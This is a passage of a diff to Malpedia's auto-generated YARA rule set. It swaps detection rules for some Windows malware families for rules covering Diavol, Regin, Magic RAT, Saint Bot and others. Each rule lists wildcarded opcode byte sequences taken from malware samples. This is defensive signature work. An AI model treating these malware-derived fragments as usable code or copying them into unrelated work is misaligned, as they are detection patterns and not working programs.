$sequence_0 = { 0f8326010000 8bce d1e9 ba49922409 2bd1 3bd6 7304 } - $sequence_1 = { 83c404 89742418 c644244806 3bf3 741d 8b542414 } - $sequence_2 = { 668944241c 52 8d44241c 50 8d4c2438 c744242000000000 e8???????? } - $sequence_3 = { e8???????? 8b542424 56 6a00 52 e8???????? 8b7c2434 } - $sequence_4 = { 8d8424a4000000 8a10 3a11 751a 3ad3 7412 } - $sequence_5 = { 8bf9 80bfd800000000 754e 6a11 6a02 6a02 } - $sequence_6 = { e8???????? 8d0cb6 c1e104 03c8 89470c 894710 } - $sequence_7 = { 8bc3 8bcf e8???????? 2bf7 b867666666 f7ee } - $sequence_8 = { e8???????? 83c414 8b45fc ff34c5e4314200 } - $sequence_9 = { 64a300000000 8b6c2420 33db 895d04 885d0c } + $sequence_0 = { 8d4c243c 50 c744245000000000 e8???????? 8d742434 bb01000000 eb53 } + $sequence_1 = { ff15???????? 8b4514 8918 8bc7 5f 5b 8be5 } + $sequence_2 = { 8d45f0 50 8b8540ffffff 8d8d40ffffff 8b4004 03c8 e8???????? } + $sequence_3 = { ff4718 40 ff7718 25ffff0000 50 68???????? 56 } + $sequence_4 = { 8d0c2a 894f18 740a 8b4704 034708 3bc8 7506 } + $sequence_5 = { 8d4c2418 e8???????? 50 b9???????? c64424302e e8???????? c705????????24215000 } + $sequence_6 = { 50 57 53 e8???????? 83c418 8b8c2424020000 64890d00000000 } + $sequence_7 = { c74704ffffffff c74710ffffffff c74714ffffffff 8b0f 8b4704 83f9ff 7504 } + $sequence_8 = { 8bd0 c645fc1e 8d8d18ffffff e8???????? 8bf0 83c404 81fe???????? } + $sequence_9 = { 2b4718 034708 8b5710 0faf570c 3903 89442410 8d442414 } condition: - 7 of them and filesize <394240 + 7 of them and filesize <2564096 } rule MALPEDIA_Win_Troldesh_Auto : FILE { @@ -160846,18 +163565,18 @@ rule MALPEDIA_Win_Troldesh_Auto : FILE condition: 7 of them and filesize <3915776 } -rule MALPEDIA_Win_Isspace_Auto : FILE +rule MALPEDIA_Win_Diavol_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6de2cc9e-3c1b-5d82-85e8-a409082de585" + id = "fdab7e4d-8bbf-526f-9dd1-9c3eccb8a369" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isspace_auto.yar#L1-L100" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diavol_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "e463ab51553d0208df8251abb329c162f866232bb82c29826d5e55ecd0eb426f" + logic_hash = "8bc41d08eecdbb842d56f4530baf282b624ea1b70952493cedafeb9a5a3b5234" score = 75 quality = 75 tags = "FILE" @@ -160871,32 +163590,34 @@ rule MALPEDIA_Win_Isspace_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 50 8d45f0 64a300000000 8965e8 c745fc00000000 c785505cffff00a20000 } - $sequence_1 = { 46 8bc6 c1e004 03c6 } - $sequence_2 = { ff15???????? 50 eb05 68???????? 68???????? ff15???????? } - $sequence_3 = { 6800010000 8d8600010000 6a00 50 e8???????? 83c418 8bc6 } - $sequence_4 = { e8???????? 83c418 83c60a 56 } - $sequence_5 = { 85c0 7507 68???????? eb04 83c007 } - $sequence_6 = { c78548ffffff9c000000 e8???????? 8ad8 c745fc00000000 } - $sequence_7 = { eb0a 6a00 6a23 eb04 6a00 } + $sequence_0 = { ff15???????? 8bf0 83feff 0f8474010000 } + $sequence_1 = { 8d8df8fdffff 51 b9???????? e8???????? 83c404 84c0 } + $sequence_2 = { 74cf 8bc7 ebce 66833800 7520 } + $sequence_3 = { e8???????? 8b4df8 83c40c 5f 5e 33cd b001 } + $sequence_4 = { 83fb01 7503 894df8 8b4d10 8bc3 } + $sequence_5 = { 752c 6a02 53 ff15???????? } + $sequence_6 = { e8???????? 83c40c 8b4dfc 5f 5e 33cd b001 } + $sequence_7 = { 6a10 46 8d843594f7ffff 68???????? 50 e8???????? } + $sequence_8 = { 8d45e4 50 8bc8 51 57 8bd0 } + $sequence_9 = { 0f84ee000000 53 57 33db 8d9b00000000 } condition: - 7 of them and filesize <434176 + 7 of them and filesize <191488 } -rule MALPEDIA_Win_Neutrino_Auto : FILE +rule MALPEDIA_Win_Saint_Bot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b9eb1524-9975-578b-ab6d-93138480d1f6" + id = "714c3147-1158-5cc4-a0a2-d44deb9955a4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neutrino_auto.yar#L1-L324" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.saint_bot_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "b8cd6770a3479380c0f958a2776eccb26f589975e6ef7e101cff7469e248afc4" - score = 60 - quality = 43 + logic_hash = "74c58e6c0a61984f0e7d1e5e39218efbc9c3b95b70a89e37e515f61493396398" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -160908,55 +163629,32 @@ rule MALPEDIA_Win_Neutrino_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? c1e010 50 ff15???????? } - $sequence_1 = { 50 6a0b 6a07 e8???????? } - $sequence_2 = { 50 6a05 6a03 e8???????? } - $sequence_3 = { 85c9 7439 8b550c 8955fc 8b45fc 0fbe08 85c9 } - $sequence_4 = { 0fbe02 85c0 7447 8b4df4 0fbe11 8b45fc 0fbe08 } - $sequence_5 = { 0404 0404 0404 0402 0202 0202 } - $sequence_6 = { 8b4d0c 894dfc 8b55f4 83c201 8955f4 ebaf 8b45f4 } - $sequence_7 = { 0404 0404 010404 0202 } - $sequence_8 = { 020402 0404 0404 0404 0404 0404 0403 } - $sequence_9 = { 51 0fb655e7 52 8b45e0 50 e8???????? } - $sequence_10 = { 0fbe08 85c9 741b 8b55fc 0fbe02 8b4df8 0fbe11 } - $sequence_11 = { 894dfc 8b55fc 0fbe02 85c0 750f 8b4d0c 894dfc } - $sequence_12 = { 6a00 ff15???????? 6880000000 ff15???????? } - $sequence_13 = { 010404 0202 020402 0404 } - $sequence_14 = { e9???????? 6a01 ff15???????? 85c0 } - $sequence_15 = { 52 ff15???????? 83f8ff 7504 32c0 eb02 b001 } - $sequence_16 = { 894d08 0fb6550c 83fa01 7509 8b4508 83c001 894508 } - $sequence_17 = { 7407 814a1800300000 f645fe01 0f8494020000 834a1801 8b45f4 } - $sequence_18 = { 6a1c 5b 8d4de0 51 50 895de0 ff15???????? } - $sequence_19 = { 8a00 ff45f4 8b7218 8ad8 c0eb06 885dfc } - $sequence_20 = { 7354 8b3b 0fb6f2 6a05 58 2bc6 8d1437 } - $sequence_21 = { 51 ff35???????? c7460480000000 ff15???????? 8906 } - $sequence_22 = { 33d2 81e100f0ffff eb08 3bc1 7409 8bd0 } - $sequence_23 = { f645fe02 740a 834a1804 8a03 884210 43 f645fe40 } - $sequence_24 = { 83c120 81fae00f0000 76ea 8b0d???????? 8908 a3???????? 5f } - $sequence_25 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc } - $sequence_26 = { 83c40c 6804010000 8d85f8fdffff 50 } - $sequence_27 = { 7507 68???????? eb05 68???????? 50 ff510c } - $sequence_28 = { 7522 be???????? ff15???????? 57 8906 ff15???????? 83c604 } - $sequence_29 = { 7412 68???????? 50 ff15???????? f7d8 1bc0 } - $sequence_30 = { 57 33ff 393d???????? 7522 be???????? } - $sequence_31 = { ff15???????? 50 ff15???????? 837dfc00 0f95c0 c9 } - $sequence_32 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 } + $sequence_0 = { 85f6 7432 837d10ff 7405 3b5d10 744f 6a04 } + $sequence_1 = { 894df8 894dec ff15???????? 8d45ec 50 8d45f8 50 } + $sequence_2 = { 668945e8 83c002 668945ea 8d45e0 8945d0 } + $sequence_3 = { c3 55 8bec 8b550c 53 0fb71a 6685db } + $sequence_4 = { 6a78 68f0000000 b800000080 50 50 680000cf00 } + $sequence_5 = { 85c0 0f84c7000000 85ff 7404 c6043800 } + $sequence_6 = { 58 6a63 668945cc 58 6a30 } + $sequence_7 = { 56 57 e8???????? ff75f0 56 57 e8???????? } + $sequence_8 = { 57 ff15???????? 56 6880000000 6a02 56 } + $sequence_9 = { 8bf0 ff15???????? 6a00 6a06 56 6a04 50 } condition: - 7 of them and filesize <507904 + 7 of them and filesize <93184 } -rule MALPEDIA_Win_Miancha_Auto : FILE +rule MALPEDIA_Win_Asprox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5e7fc19e-d4d3-5751-a42a-778cf2bcb637" + id = "828c56dd-0390-5296-8de7-1a48d10f0f57" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miancha_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.asprox_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "1f67b71b2562c78fd331e78fe99dcc1e4206e3c62481b807645f41343dd343bc" + logic_hash = "3b610e4cac05eeb099f6aceb2af12383510de1c04c209adb95ec16fa7dbc09d7" score = 75 quality = 75 tags = "FILE" @@ -160970,32 +163668,71 @@ rule MALPEDIA_Win_Miancha_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7412 8d542418 52 ff15???????? } - $sequence_1 = { 6803000080 ff15???????? 85c0 741f 6a00 } - $sequence_2 = { 8b15???????? 894808 8a0d???????? 89500c 884810 } - $sequence_3 = { 40 50 56 8b35???????? 6a02 6a00 } - $sequence_4 = { 85f6 7412 8d542418 52 ff15???????? 50 } - $sequence_5 = { ff15???????? 50 ffd6 85c0 741a } - $sequence_6 = { 8d542418 52 ff15???????? 50 ffd6 85c0 } - $sequence_7 = { 50 68???????? e8???????? 33f6 83c408 } - $sequence_8 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? } - $sequence_9 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c } + $sequence_0 = { 85c0 740f 6a00 ff15???????? 50 ff15???????? ff15???????? } + $sequence_1 = { ff15???????? 6a00 6a00 8b5518 52 8b45c4 } + $sequence_2 = { 898558ffffff 8b8560ffffff 898570ffffff 8b4ddc 898d30ffffff c78534ffffff00000000 } + $sequence_3 = { 0fb655fd 83fa01 0f8503010000 c6859ffeffff00 68???????? ff15???????? 8985a4feffff } + $sequence_4 = { ff45fc 83c004 817dfcff000000 7ede 83a34404000000 ba00010000 8d8348040000 } + $sequence_5 = { 8d849d20feffff 894dc0 8945b0 8b00 8bcf 2bc8 895dbc } + $sequence_6 = { 51 8b952cffffff 52 ff15???????? 898558ffffff 8b8560ffffff 898570ffffff } + $sequence_7 = { 57 395d08 0f8498000000 8b750c 3bf3 0f848d000000 8b7d10 } + $sequence_8 = { 50 ff15???????? 898558ffffff 8b4dd8 } + $sequence_9 = { 8d840a00100000 50 6a00 8b0d???????? 51 ff15???????? 8945fc } condition: - 7 of them and filesize <376832 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Scieron_Auto : FILE +rule MALPEDIA_Win_Magic_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9adad1f-0463-5c84-9844-b56939af8a07" + id = "fef12775-f5d4-5648-9916-cb915f91f28b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scieron_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magic_rat_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "0253954720ef9ca79516bb585b52e8d461b9169ed80f649da26edf6b8044019f" + logic_hash = "d23de63f3611a6306ebe3970ddd7285c351120d5c12dbd45ba2d1d594ef068a3" + score = 60 + quality = 45 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 85c0 7407 3dffff0000 756f } + $sequence_1 = { f20f2ac9 f20f5cc1 f20f58c3 f20f2cc0 } + $sequence_2 = { 0f84b8000000 83faff 7408 f0830001 } + $sequence_3 = { 660f2ec2 7308 660f5705???????? 660f2ee2 f20f59c5 7308 660f5725???????? } + $sequence_4 = { 29c2 89d0 c1f80e f7d8 eb08 } + $sequence_5 = { 8b01 81e20080ffff 25ff7f0000 09d0 } + $sequence_6 = { 8b4500 85c0 0f8472010000 83f8ff 740b f0836d0001 } + $sequence_7 = { f20f58c3 f20f2cd0 01ca e9???????? } + $sequence_8 = { 85d2 740b 83faff 74ad f0832801 } + $sequence_9 = { 81fa???????? 7442 81fa???????? 744a } + + condition: + 7 of them and filesize <41843712 +} +rule MALPEDIA_Win_Regin_Auto : FILE +{ + meta: + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "ce7821ca-cfed-5ada-bd4c-3b99c9cf64f9" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.regin_auto.yar#L1-L120" + license_url = "N/A" + logic_hash = "985ecd1548d174f4606bb21325679aedf195f3d6056cd99e3d5f01bd16dfaa46" score = 75 quality = 75 tags = "FILE" @@ -161009,32 +163746,32 @@ rule MALPEDIA_Win_Scieron_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc6 ff75f8 e8???????? 59 59 } - $sequence_1 = { 57 ff7508 8d859cf9ffff 68???????? } - $sequence_2 = { 68???????? ff15???????? 50 ffd3 ffd0 807d0c02 742a } - $sequence_3 = { 8bec 83e4f8 b81c800000 e8???????? 53 } - $sequence_4 = { 897574 ff15???????? 8d4574 50 56 56 } - $sequence_5 = { eb65 8b4734 50 894574 8d472c 50 } - $sequence_6 = { 8bf8 85ff 7418 8d45fc } - $sequence_7 = { 40 40 663938 75df } - $sequence_8 = { 033e 68???????? 68???????? ff15???????? } - $sequence_9 = { 83a61c02000000 33c0 40 5f 5d } + $sequence_0 = { 49 8363f000 48 8d0504230000 49 8943d8 } + $sequence_1 = { 48 89442438 b800210000 c7442430204e0000 89442428 } + $sequence_2 = { 85c0 740c 8b05???????? 39442460 7405 } + $sequence_3 = { c1e802 41 ffc0 48 8d4c2470 41 } + $sequence_4 = { 44 8bc1 48 8b0d???????? ff15???????? } + $sequence_5 = { 48 89442448 48 89442450 b82375f1ba } + $sequence_6 = { 33c0 48 83c428 c3 48 83ec28 33c9 } + $sequence_7 = { 0f45df 8bc3 48 8b5c2448 } + $sequence_8 = { 84c0 44 8d7304 0f45f8 8d4302 44 84c0 } + $sequence_9 = { 48 8bfb 8bc7 48 8b5c2430 48 } condition: - 7 of them and filesize <100352 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Unidentified_069_Auto : FILE +rule MALPEDIA_Win_Racket_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "26eb5c23-2d98-5320-b3d2-36b6e8a74eb7" + id = "7cb28a65-c30c-589f-a924-680f6f853124" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_069_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.racket_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "c4b44dbf77c8a02d5a553e1bfca3c92784cdebd7456417ad5b23ba2172632d6b" + logic_hash = "d1589a59b0768c1bd03360a8449d283c6a3783d8d4ace18ebd09610946148618" score = 75 quality = 75 tags = "FILE" @@ -161048,32 +163785,32 @@ rule MALPEDIA_Win_Unidentified_069_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd3 33c0 5f 5b c9 c20400 55 } - $sequence_1 = { 8bc6 c1e710 e8???????? 0fb7c0 0bc7 8945cc } - $sequence_2 = { ff15???????? 8b3d???????? 8945f0 3bc6 7460 53 } - $sequence_3 = { 85c0 7520 ff7508 e8???????? 85c0 7414 ff7508 } - $sequence_4 = { 68???????? 891d???????? 891d???????? ffd6 8b35???????? 68???????? ffd6 } - $sequence_5 = { 84c0 7504 c645fa01 807dfbff 6a08 5b 0f8581000000 } - $sequence_6 = { 52 51 50 e8???????? 015608 837de000 8b4608 } - $sequence_7 = { 7447 8d85c8fdffff 50 e8???????? 6811270000 56 } - $sequence_8 = { 83e924 85ff 77f3 3bf8 7427 85ff 750e } - $sequence_9 = { 837d0800 0f85a0000000 e8???????? 8bf0 85f6 0f8491000000 } + $sequence_0 = { ffd3 8b8eec000000 8bf8 8b1d???????? 8d45ec 57 50 } + $sequence_1 = { 807d0800 743b e8???????? 6a00 ff7604 6845090000 ff35???????? } + $sequence_2 = { 57 0f1f840000000000 8bc1 c745fc02000000 2bc2 8dbb78fdffff 81c680fdffff } + $sequence_3 = { 0f44c1 50 ff75f4 8b473c 68a2090000 ff34856cb30610 ff15???????? } + $sequence_4 = { 40 50 68???????? 6aff 8d85fcfdffff 6800010000 50 } + $sequence_5 = { 0f8433020000 833d????????00 0f8426020000 833d????????00 0f8419020000 833d????????00 0f840c020000 } + $sequence_6 = { 83c430 3945cc 8b45b8 7501 40 8b4dc0 } + $sequence_7 = { 8b4e04 85c9 7537 8b4510 8b7838 85ff 7e75 } + $sequence_8 = { ff740e08 68ac080000 ff35???????? ff15???????? 83c420 2bd8 7418 } + $sequence_9 = { 6a00 68d6070000 897ddc ff34856cb30610 8975d0 ff15???????? 83c410 } condition: - 7 of them and filesize <434176 + 7 of them and filesize <985088 } -rule MALPEDIA_Win_Grok_Auto : FILE +rule MALPEDIA_Win_Heloag_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "870cf4c1-459b-52f4-a686-b281f5585948" + id = "ef07a0f3-faff-581a-a00e-f3d94c2f2e27" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grok_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heloag_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "f55e3b1924db1bff1757dac784f11d8f8a3020681a2893ba57b274944ef08137" + logic_hash = "d41534ff803a8c13a09a17ccbef4333268f3c2d9e67aea8ce8ca3bb7d4a205eb" score = 75 quality = 75 tags = "FILE" @@ -161087,32 +163824,38 @@ rule MALPEDIA_Win_Grok_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 39702c 7413 56 ff702c ffd3 a1???????? 89702c } - $sequence_1 = { 7c62 a1???????? 397044 7412 56 ff7044 ff15???????? } - $sequence_2 = { 51 57 50 e8???????? 83c40c 57 53 } - $sequence_3 = { 33ff 897dd8 81ff00010000 7d28 8d0c17 8b4514 03c7 } - $sequence_4 = { a1???????? 895820 a1???????? 395824 } - $sequence_5 = { 894df4 eb09 8b55f4 83c201 8955f4 8b45f8 83c009 } - $sequence_6 = { 5f 56 56 6a22 6a01 56 } - $sequence_7 = { 50 e8???????? 3bc3 7d7e 395d08 7479 3d430000c0 } - $sequence_8 = { 33ff 47 3bc3 8945fc 0f8c9c000000 391d???????? 7410 } - $sequence_9 = { 53 51 03c6 50 e8???????? 8b463c 8d8c3080000000 } + $sequence_0 = { 66ab aa 83c9ff 8bfe 33c0 } + $sequence_1 = { 8bf7 8bfa 8a15???????? c1e902 f3a5 8bc8 } + $sequence_2 = { 8d4dbc 51 ffd7 8b45c4 b919000000 } + $sequence_3 = { 8b0d???????? 51 e8???????? 6a14 e8???????? 8bf0 83c408 } + $sequence_4 = { f3a4 a2???????? a2???????? a3???????? } + $sequence_5 = { 7cc4 8b45fc 8b0d???????? 40 } + $sequence_6 = { 6a00 6a00 ffd0 33c9 a3???????? 85c0 0f95c1 } + $sequence_7 = { 8d8dacfdffff 68???????? 51 e8???????? 8b55b4 83c41c 66c745b80200 } + $sequence_8 = { 8b4e0c 3bcd 8b07 89442410 7464 } + $sequence_9 = { 894b0c 8a48ff fec1 8848ff eb3c 6a01 55 } + $sequence_10 = { 8b4108 50 e8???????? 6a01 } + $sequence_11 = { 85c0 7505 a1???????? 8b4c242c } + $sequence_12 = { 51 53 68???????? 8d4c2420 ff15???????? } + $sequence_13 = { 8a442413 6a00 8bce 8806 ff15???????? } + $sequence_14 = { 8b11 8bcf 52 6a00 50 ff15???????? } + $sequence_15 = { a1???????? 894304 8b5608 895308 8b4e0c 894b0c } condition: - 7 of them and filesize <84992 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Shadowpad_Auto : FILE +rule MALPEDIA_Win_Quickheal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c7d36336-f736-58f8-9fa1-3e3ab1239351" + id = "1144a28c-6891-50e3-aab7-fbd2738d1ce6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shadowpad_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quickheal_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "af53d025dfe83e5b7a4ca7b9e68b22a960854fdb5b48b2d1cee2b2ef3fbc15f2" + logic_hash = "c8252dc1fbd623ed33de5c38485302af864b4c120786c74e672f39f82eb29422" score = 75 quality = 75 tags = "FILE" @@ -161126,32 +163869,32 @@ rule MALPEDIA_Win_Shadowpad_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 59 8d75dc a3???????? e8???????? 53 ff15???????? } - $sequence_1 = { 5b c9 c3 55 8bec b8f8100000 e8???????? } - $sequence_2 = { 8bec 53 57 ff7508 ff15???????? 8d7801 } - $sequence_3 = { 8d45e8 50 53 8d75d0 } - $sequence_4 = { 7e25 8a0c56 8a445601 80e961 2c6a } - $sequence_5 = { 50 6a04 5f e8???????? 85c0 75ae 8d4310 } - $sequence_6 = { 83ec24 53 56 57 33ff 393d???????? } - $sequence_7 = { e8???????? 8b1d???????? 50 ffd3 6800010000 668945f0 } - $sequence_8 = { 8bfe 8d45e8 895de8 895dec 895df4 895df0 885df8 } - $sequence_9 = { 0fb639 c1ce08 83cf20 03f7 83c102 81f6a3d9357c 663919 } + $sequence_0 = { 7ce2 b814010000 8a8c28f8feffff 888c0484000000 40 3d30010000 72ea } + $sequence_1 = { 3bf3 0f840b030000 8d4e02 8d542424 51 } + $sequence_2 = { ff15???????? 8d542410 8d8424fc060000 52 6819000200 53 } + $sequence_3 = { 49 51 6a06 52 ffd5 83c408 } + $sequence_4 = { 2bce 51 56 50 56 e8???????? 83c410 } + $sequence_5 = { 8d445d0c 83c408 33f6 6683f93b } + $sequence_6 = { 83c102 3bc6 7cf0 5f } + $sequence_7 = { 7207 885101 04fc eb04 c6410100 3c02 7209 } + $sequence_8 = { f7d1 49 8dbc2414010000 8bd1 83c9ff f2ae a1???????? } + $sequence_9 = { 52 ffd7 85c0 7418 8b442410 c744241404010000 50 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <553984 } -rule MALPEDIA_Win_Skinnyboy_Auto : FILE +rule MALPEDIA_Win_Rekoobew_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c1dca40b-594e-536c-99f6-c4dd1e2fe372" + id = "73ccfc35-4eed-5955-a644-c948264eda18" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skinnyboy_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rekoobew_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "70d89835d7c3795dc1cc1ad5fe812e10b23259f8f17b962d2f0a6c8239d19e5a" + logic_hash = "445ddabcfd3896aee22b87d60b9d2106a9693bf00a56789028f0bf36c80e8900" score = 75 quality = 75 tags = "FILE" @@ -161165,34 +163908,34 @@ rule MALPEDIA_Win_Skinnyboy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a03 6a00 6a00 68bb010000 ffb5ccfeffff 56 ff15???????? } - $sequence_1 = { ff30 8945f0 ff36 8975f4 } - $sequence_2 = { 660fd68564feffff f30f7e05???????? 8d8576feffff 6a00 50 660fd6856cfeffff e8???????? } - $sequence_3 = { ffd7 ffd3 6a00 6a00 } - $sequence_4 = { c7856cffffff464b1153 c78570ffffff05170610 c78574ffffff035d591e c78578ffffff01591244 } - $sequence_5 = { c1fb05 8bfe 83e71f c1e706 8b049d10110110 } - $sequence_6 = { ff15???????? 8bf0 89b5d8feffff ffd3 } - $sequence_7 = { c745bc79000000 660fd645c0 660fd645c8 c745e457000000 660fd645e8 660fd645f0 } - $sequence_8 = { 85d2 740f 668b444de4 6631444dd0 41 3bca } - $sequence_9 = { 8d45f4 50 ff7308 ff15???????? 8b15???????? 85c0 } + $sequence_0 = { 337dec 337dd0 d1c7 897db8 8d8c39dcbc1b8f 894df0 89c1 } + $sequence_1 = { 89e5 57 56 53 81ecbc000000 e8???????? 8945e0 } + $sequence_2 = { 89df 0fb63482 c1e618 0fb65c8201 } + $sequence_3 = { 8b1c9de0944000 c1e310 31df 8b4dd8 0fb6dd 8b1c9de0944000 c1e308 } + $sequence_4 = { 7409 3b7510 0f8fd3000000 0fb645e8 c1e004 89c7 b8ffffffff } + $sequence_5 = { c744240808000000 89742404 891c24 e8???????? c744240804000000 897c2404 891c24 } + $sequence_6 = { 8b3c95e07c4000 33bb54010000 8b55f0 c1ea18 333c95e0704000 89f2 c1ea10 } + $sequence_7 = { 56 53 83ec5c 8b450c 0fb65003 0fb638 } + $sequence_8 = { 89f1 31d1 31d9 8d0c0f 89c7 c1c705 01f9 } + $sequence_9 = { 895008 8b500c 89d6 c1ee18 8b3cb5e0944000 89d6 } condition: - 7 of them and filesize <176128 + 7 of them and filesize <248832 } -rule MALPEDIA_Win_Aresloader_Auto : FILE +rule MALPEDIA_Win_Ayegent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aecf8195-bc3f-5d42-bd81-bfa1c242c64d" + id = "38c6d34b-791e-51ab-b755-5bf91f226c75" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aresloader_auto.yar#L1-L109" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ayegent_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "3fed3bf2cf5088e9a8f4396999f890e21fa81afee0e4b5adddfaf27ad4b3888c" - score = 60 - quality = 25 + logic_hash = "7245e65e015426e49adecdb4c2a9413e067a055fe3d65973ee2cacb00da6dd3e" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -161204,32 +163947,32 @@ rule MALPEDIA_Win_Aresloader_Auto : FILE 